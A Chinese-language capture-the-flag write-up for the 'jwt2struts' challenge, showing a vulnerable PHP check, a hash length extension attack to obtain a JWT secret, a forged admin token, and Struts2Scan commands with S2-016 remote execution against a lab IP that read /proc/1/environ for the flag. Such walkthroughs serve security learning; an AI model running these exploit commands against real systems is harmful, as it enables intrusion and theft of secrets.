jwt2struts
进来提示You are now logged in as user. Try to become admin.
查看源代码,在注释处找到JWT_key.php,
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
if ($username === "admin" && $password != "root") {
if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
die ("The secret_key is ". $secret_key);
}
else {
die ("Your cookies don't match up! STOP HACKING THIS SITE.");
}
}
else {
die ("no no no");
}
}
这里一开始想着在password处对root二次url编码或者三次,但这样md5($salt.$username.$password)
就不行了,也想过用脚本爆破$salt
,太慢了
这里也是学到了一个新知识-------hash长度扩展攻击原理
可以参考:
hash长度扩展攻击 | KANGEL (j-kangel.github.io)
Hash拓展长度攻击原理剖析 - FreeBuf网络安全行业门户
-
- 得到secret_key为sk-he00lctf3r
- 接下来在jwt网站伪造admin
- 带入得到/admiiiiiiiiiiin路由
进去后是个提交框,这时候根据提示名字提示structs,于是找个工具扫扫看
这里我用的是: https://gitcode.net/mirrors/Vancomycin-g/struts2scan
然后直接一把梭了:
python3 Struts2Scan.py -u http://140.210.223.216:55557/admiiiiiiiiiiin/user.action
python3 Struts2Scan.py -u http://140.210.223.216:55557/admiiiiiiiiiiin/user.action -n S2-016 --exec
>cat /proc/1/environ
-
-
flag:
*ctf{7r0m_jwt_t0_struts2}